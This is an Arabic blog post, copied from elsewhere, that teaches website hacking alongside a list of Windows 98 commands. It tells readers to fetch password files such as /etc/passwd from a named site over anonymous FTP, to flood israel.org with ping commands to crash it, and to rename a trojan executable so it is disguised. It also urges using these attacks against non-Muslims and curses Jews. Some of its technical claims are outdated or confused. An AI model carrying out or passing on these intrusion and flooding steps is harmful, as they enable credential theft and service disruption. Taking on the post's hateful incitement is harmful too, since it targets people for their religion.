لكي
تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع
User
name-Password
وهما
يكونان محفوظين في ملف يسمي
PASSWDغالبا
بعض
المواقع تضع هذا الملف في الإف تي بي
ما هو
إف تي بي؟
FTP=File
Transfer Protocol بروتوكول نقل الملفات تستطيع
الاتصال بالموقع وسحب هذا الملف عن طريق التلنت
·start==>run إبدأ ثم تشغيل
واكتب telnet
سيفتح
التلنت اضغط علىRemote
System ==> connect
ثم اكتب
الموقع في Host Name
مثلا
kahane.org
أو الآيبي الخاص به
وفي PORT اكتب 21 وهو البورت
الخاص بالإف تي بي
ثم اضغط
connect
وبعد أن
يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code
user
anonymous
ثم انتر
بعدها يطلب السيرفر كلمة السر اكتب
pass
zzzoozz@yahoo.com <mailto:zzzoozz@yahoo.com>
اكتب أي
بريد ككلمة سر وطبعا سيكون وهميا
ماذا فعلنا؟لقد
دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا
يسمح..
بعدها
سنحصل على ملف الباسوورد
لتحصل
على الملف في التلنت اكتب
retr
/etc/passwd
/etc هو المجلد الذي يحتوي
الملف passwd
ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع
Sunos 5.0
etc/shadow
او etc/passwd
Linux
etc/shadow او etc/passwd
BSD4.3
-RENO etc/master.passwd
AIX
etc/security/passwd
NT
ويندوز scripts/passwd
وتختلف
أسماء ملف الباسوورد بين passwd
و admin.pwl
و غيرها
أغلب
استخدامات الدوز والمعروفة
1-command هذا الامر يدخلك الى
موجه الدوس .
2-regedit هذا الامر لمحرر سجل
الوندووز ( الشجرة ) .
3·-icwscrpt هذا الامر خاص بنسخ
ملفات الـ dll
4-scandskw هذا الامر لعمل تفحص
للاقراص .
5-imgstart هذا الأمر لتشغيل قرص
ويندووز المضغوط
6-msiexec حقوق تركيب ويندووز .
7- : d : c للوصول السريع إلى
الدرايفرات
8-hwinfo /ui لمعرفة معلومات عن
جهازك وفحصه بالكامل عن طريق الدوس واعداد تقرير بذلك
9-cleanmgr وهذا الامر يشغل
برنامج تنظيف القرص
10-packager وهذا الامر لبرامج
يغير الايقونات
11-recent هذا الامر لإستعراض
ملف المستندات ( الموجود في قائمة إبدأ
12-- sysedit هذا الامر(لفتح محرر
تكوين النظام) لويندوز 98. حيث يقوم بفتح هذه النوافذ الخمسة التالية :
protocol.ini
system.ini
win.ini
config.sys
autoexec.bat
13-sfc وهذا الامر لإسترجاع
بعض ملفات الـ dll
عندما تتلف
14-taskman وهذا الامر لمشاهدة
البرامج التي تعمل حاليا
15-debug لمعرفة نوع كرت
الفيديو او الشاشة
16-DEFRAG لإلغاء تجزئة القرص
17-DVDPLAY مشغل افلام dvd يعمل مع ملينيوم
18-winipcfg لمعرفة IP
19-TEMP للوصول الى ملفات
الويندوز المؤقتة
20-- tuneup هذا الامر لتشغيل
برنامج معالج الصيانة
21-mobsync هذا الامر لظهور
برنامج تنزيل الصفحات من الانترنت و تصفحها بدون اتصال
22-cdplayer هذا الامر لتشغيل
برنامج قاريء الأقراص المضغوطة
23-ftp هذا الامر لجلب
البرامج بسرعه من الدوس .
24-Tips.txt هذا الأمر يظهر بعض
أسرار ويندووز 98
25-- telnet وهذا الامر يشغل
برنامج telnet
26-progman وهذا الامر يأخذك الى
قائمة البرامج.
27-drwatson أداة لتشخيص أخطاء
النظام.
28-cliconfg.
29-- mkcompat.
30-CVT1.EXE
هذا
الأمر لتشغيل معالج محول محركات الأقراص إلى نظامfat32
31-SCANREG
مدقق
تسجيل ويندوزلتفحص التسجيل
32-Tune up
هذا
الأمر لتشغيل معالج الصيانة ومن مهامه:
1/
تسريع البرامج المستخدمة بشكل متكرر
2/
تدقيق القرص الثابت لاستكشاف الأخطاء
3/ حذف
الملفات الغير ضرورية من الجهاز
ويمكن
استخدام هذا الأمر لنفس الغرض TUNEUP.EXE
34-SYSEDIT
محرر
تكوين النظام لا ينصح بتغيير أي شيء فيها إلا من قبل الخبراء أو من لديهم معرفة
تامة بالتعديلات التي يريدون عملها على هذا المحرر
35-VCMUI
أداة
تعارض الإصدارة وظيفتها التحقق من الملفات التي لديها رقم إصدارة احدث أو كانت بلغة
مختلفة قبل تثبيت النظام لاستعادتها
شرح
مبسط عن هذه الأداة:
أثناء
تثبيت برامج جديدة، بما فيها Windows
98، قد يتم الكشف عن الإصدار القديمة لملفات
البرامج
واستبدالها بالإصدار الجديدة. ويتم إنشاء نسخة احتياطية للإصدارات السابقة وتُحفظ
على
القرص الثابت.
في حال
وجدت تعارضات مع ملفات النظام أو ملفات البرامج بعد تثبيت تطبيق، تُستخدم إدارة
تعارض
الإصدار
لاستعادة ملف النسخة الاحتياطية.
وتذكر
إدارة تعارض الإصدار كافة ملفات النسخة الاحتياطية، وتاريخ إجراء النسخة
الاحتياطية،
وأرقام
الإصدار لملفات النسخة الاحتياطية والملفات الحالية. وعند استعادة ملف النسخة
الاحتياطية،
حينئذ،
يتم إنشاء نسخة احتياطية للإصدار الحالي. ويبقى الإصداران متوفرين.
ملاحظة
مهمة : يجب استخدام هذه الأداة من قبل شخص لديه معرفة متقدمة بالنظام
36-UPWIZUN
إلغاء
تثبيت معالج التحديث وظيفته كالتالي:
ربما قد
استخدمت Windows Update
لتثبيت إصدار محدّث من أداة تصحيح،
أو
برنامج تشغيل، أو أداة نظام. إذا قررت فيما بعد إلغاء تثبيت الإصدار الجديد،
ولم
تتمكن من إعادة تأسيس الاتصال بإنترنت، استخدم إلغاء تثبيت معالج التحديث
للعودة
إلى الإصدار السابق.
37-Asd.exe
أداة
تشغيل عامل برنامج تشغيل التخطي التلقائي
وظيفته:
يعرّف برنامج تشغيل التخطي التلقائي (ASD) حالات الفشل
التي
تسببت في توقف Windows
عن الاستجابة في عمليات بدء التشغيل السابقة
ويضع
عليها علامات بحيث يتم تجاوزها في عمليات بدء التشغيل اللاحقة.
يذكر ASD كافة الأجهزة أو
العمليات التي فشل بدء تشغيلها. ويمكنك استخدام ASD لتمكين
أي جهاز
تم تعطيله سابقاً بواسطة ASD،
وسيحاول Windows
استخدام الجهاز
في
محاولة بدء التشغيل التالية. وفي حال الفشل، يتوقف الكمبيوتر عن الاستجابة.
وعند
إعادة تشغيل الكمبيوتر مرة أخرى، يمنع ASD تشغيل العملية سامحاً
لك ببدء تشغيل الكمبيوتر
الدوس
هو برنامج يأتي مع الويندوز وهو عبارة عن مواجهه خطية يتلقى الأوامر من المستخدم
ويقوم بتنفيذها.هذا باختصار
والهكر
عن طريق الدوس(DOS)
له تأثير مرعب وقوي جداً وهذه بعض أوامر الدوس حتى نتعرف عليه أكثر:-
لتشغيل
الدوس إذهب إلى إبدأ>تشغيل>وأكتب command أو (start>runمنللخروجوالأمرالكثيرةالاوامرتكتبهامرايلاستقبالا
لدوسموجةلكستنفتح
1-أكتب
الأمرmsconfig
لمعرفة البرامج اللتي تعمل وقت التشغيل او عند بدء التشغيل ولتتجنب الاختراق يمكنك
عن طريق هذا الامر ثم إذهب إلى بدء التشغيل وانظر الى البرامج العامله وقم باطفاء
أي برنامج غريب يعمل عند بدء التشغيل.
2-
الأمر Control
لفتح لوحة التحكم .
3-
الأمر telnet
لفتح نافذة التلنت والاتصال بجهاز بعيد بمعرفة الاي بي والبورت.
4-
الأمر ping
http://www.israel.org/ لمعرفة IP الموقع ويستعمل في
الهجوم ضد الموقع. ملاحظه/هناك مسافه بين ping http. يمكنك تغير (israel.org) بأي موقع.
5-
الأمر ping
-twww.israel.org لارسال رسايل تتسبب في انهيار
الموقع عند اجتماع الكثير من المستخدمين على القيام بها ضد موقع معين .
6-
الأمر netstat -n
لاظهار IP
أي شخص انت ترسل له ملف عبر الماسنجر اكتب هذا الامر بينما انت ترسل وسيظهر IP تبعه في موجة الدوس
والاي بي تبعك انت ايضا.
7-
الأمر winipcfg
لمعرفة IP
الخاص بك.
8-
الأمر System.ini
انظر الى السطر السادس ولابد ان يكون هكذا user.exe=user.exe والا فجهازك مخترق
9-
الأمر regedit
ثم اتبع الاتي
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>Curr
entVersion>Run واي ملف يحمل امتداد exe واسمه name قم بحذفه فهو الباتش
تقريبا .
اما
بخصوص بينق تدمير المواقع فهي كالتالي:-
1-ping http://www.israel.org/
لمعرفة IP
الموقع.
2-ping -t http://www.israel.org/
يحمل الضغط على الموقع المستضيف.
3-ping -t -a -f http://www.israel.org/
يقوم بإعطاء أوامر إلى المستضيف.
4-ping -w timeout http://www.israel.org/
قوم بتوضيح سرعة الموقع الحالية.
10- كيف
تستخدم اوامر الدوس في بعض الهجوم
con/con.wav
com1/com1.wav
com2/com2.wav
التفاصيل
هنا
طريقة
تغيير امتداد exe
عن طريق الدوس جديد
اتبع
الخطوات التالية:-
إبدأ>تشغيل>وأكتب
command
أو (start>runcopy
server.exe server.com طبعا server هو اسم الباتش تبعك
وممكن تغير الامتداد الى com,scr,bat
إخواني المسلمين لاتستخدموا هذه الطريقة ضد إخوانكم المسلمين وانما استخدموها ضد
الكفار كما هو هدف الموقع وبخوصا اليهود قاتلهم الله ولعنهم.
()()(هجوم
الدوز المخيف)()(
هجوم DOS هو واحد من أخطر أنواع
الهجمات الموجودة في الفضاء الافتراضي، وهو يكلف عالم الأعمال ملايين الدولارات كل
عام، كما يشكل تهديداً حقيقياً لأي نظام أو شبكة موجودة على طريق المعلومات
السريع، تتعلق هذه التكلفة بزمن تعطل النظام، ضياع الموارد، والعمل الفيزيائي
اللازم لتحليل والرد على هذا النوع من الهجوم.
ليس
المقصود بـ DOS
نظام التشغيل الشهير من مايكروسوفت، إنما المقصود هو هجوم رفض الخدمة Denial of Service Attack
، حيث يقوم المخترق بهذا الهجوم بهدف التخريب والتدمير، وهو لا يحتاج إلى مهارة
عالية أو معرفة تقنية عميقة لأن الأدوات الضرورية متاحة ويمكن بسهولة تحميلها من
الإنترنت.
أصابت
هجمات DOS
العديد من المواقع المهمة والضخة مثل CNN, Yahoo, Bay, ZDNet…. وغيرها، مما أدى إلى
توقفها تماماً عن العمل لفترات مختلفة، حدث ذلك في شهر فبراير من العام 2000.
يعتمد
هذا الهجوم على استغلال نقاط الضعف في بروتوكول (TCP/IP) المصمم للعمل أساساً
في بيئة آمنة مفتوحة، مما جعله يحوي العديد من الثغرات التي يمكن أن يستخدمها
المخترقين Crackers.
من
المفارقات في هذا الموضوع أن المخترقين المحترفين وحتى المخربين منهم يعتبرون هذا
النوع من الهجوم أنه رديء ويسخرون ممن يقومون به باعتباره أنه أسلوب المبتدئين،
ولا يحتاج إلى معرفة وخبرة.
منقوووول
للأمانة ..............
ليست هناك تعليقات :
إرسال تعليق